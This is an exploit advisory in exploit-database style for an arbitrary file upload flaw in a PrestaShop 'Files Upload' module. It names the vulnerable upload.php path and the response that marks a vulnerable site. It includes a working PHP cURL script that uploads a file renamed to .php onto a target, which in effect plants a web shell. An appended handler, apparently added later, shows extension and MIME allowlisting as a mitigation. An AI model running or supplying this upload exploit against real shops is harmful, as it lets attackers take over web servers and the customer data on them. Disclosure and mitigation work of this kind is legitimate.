Module Files Upload Arbitrary File Upload - PrestaShop


#- Title: Module Files Upload Arbitrary File Upload - PrestaShop
#- Author: UyulCrack
#- Published : 30/06/2016
#- Developer : Prestashop
#- Link Download : addons.prestashop.com/fr/4270-files-upload.html
#- Price : 79,99 €
#- Google Dork: Use Your Brain
#- Fixed in Version : -
#- Tested on : windows
=======================================================
-- Proof Of Concept --

Description : 

Simplify sending large files to your customers! This module allows your customers to send you one or more files in a simple and fast way. For example, a client wants to send EPS files of several gigabytes.
With this module you can recover the files directly in the back office of your PrestaShop.


  • Multilingual
  • Multi Upload
  • Drag and Drop
  • Filter on file extensions
  • Limit files size
  • Download customers files on the backoffice
  • Send a mail to the customer at the end of the upload
  • Send an email to the admin of the store
  • Only connected customers can upload files
  • Multi-Hook Module: right column, top left page, product page.



Vulnerability : 
site/modules/filesupload/upload.php

Response when vulnerable : 
{"jsonrpc" : "2.0", "result" : null, "id" : "id"}



CSRF


<?php

$url = "http://www.site"; // put URL Here
$post = array
(
"file" => "@3xploi7.jpg",
"name" => "
3xploi7.php"
);
$ch = curl_init ("$url");
curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, 5);
curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt ($ch, CURLOPT_POST, 1);
@curl_setopt ($ch, CURLOPT_POSTFIELDS, $post);
$data = curl_exec ($ch);
curl_close ($ch);
echo $data;

?>
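
The request above sends a .jpg file together with a separate "name" field ending in .php. Assuming the module stores the upload under that client-supplied name, the following handler shows the mitigation: it is an added example, not the module's code and not from the original post, and `store_upload`, the allowlist and the destination path are hypothetical.

```php
<?php
// Added example, not the module's code. Assumptions: the form fields are
// "file" and "name" as in the request above; $destDir and $allowed are
// hypothetical settings. Requires PHP 7+ and the fileinfo extension.

function store_upload(array $file, string $clientName, string $destDir, array $allowed): ?string
{
    // Accept only a completed upload that PHP itself received over HTTP.
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK
        || !is_uploaded_file($file['tmp_name'])) {
        return null;
    }

    // Both names are client-controlled: each must carry the same allowlisted extension.
    $ext = strtolower(pathinfo($clientName, PATHINFO_EXTENSION));
    $sentExt = strtolower(pathinfo((string) $file['name'], PATHINFO_EXTENSION));
    if ($ext !== $sentExt || !isset($allowed[$ext])) {
        return null;
    }

    // The detected content type must match what that extension claims.
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($file['tmp_name']);
    if ($mime !== $allowed[$ext]) {
        return null;
    }

    // The stored name is generated server-side; only the vetted extension is reused.
    $stored = bin2hex(random_bytes(16)) . '.' . $ext;
    $target = rtrim($destDir, '/') . '/' . $stored;
    return move_uploaded_file($file['tmp_name'], $target) ? $stored : null;
}

// Constructed allowlist: extension => expected MIME type.
$allowed = ['jpg' => 'image/jpeg', 'png' => 'image/png', 'pdf' => 'application/pdf'];

if (($_SERVER['REQUEST_METHOD'] ?? '') === 'POST' && isset($_FILES['file'])) {
    $name = is_string($_POST['name'] ?? null) ? $_POST['name'] : '';
    // Hypothetical destination outside the web root.
    $stored = store_upload($_FILES['file'], $name, '/var/lib/shop-uploads', $allowed);
    http_response_code($stored === null ? 400 : 200);
    header('Content-Type: application/json');
    echo json_encode(['jsonrpc' => '2.0', 'result' => $stored, 'id' => 'id']);
}
```

Keeping the destination directory outside the web root, or with script execution disabled for it, still matters if one of these checks is ever bypassed.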









If Successfully   > 




Greetings by UyulCrack
Thanks for TKJ Cyber Art - Indonesian Code Party - ZeynnymouZ
